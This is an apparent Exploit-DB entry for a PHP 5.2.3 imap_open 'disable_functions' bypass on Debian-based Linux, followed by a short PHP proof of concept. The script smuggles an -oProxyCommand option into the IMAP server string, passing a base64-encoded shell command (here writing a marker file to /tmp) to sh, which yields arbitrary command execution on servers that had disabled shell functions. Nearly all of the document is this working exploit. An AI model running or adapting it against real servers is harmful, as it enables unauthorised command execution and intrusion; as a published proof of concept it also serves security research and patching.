PHP 5.2.3 imap (Debian Based) - 'imap_open' disable_functions Bypass

EDB-ID:

45865

CVE:

N/A




Platform:

Linux

Date:

2018-11-14


<?php
# https://antichat.com/threads/463395/#post-4254681
# echo '1234567890'>/tmp/test0001

$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";

imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());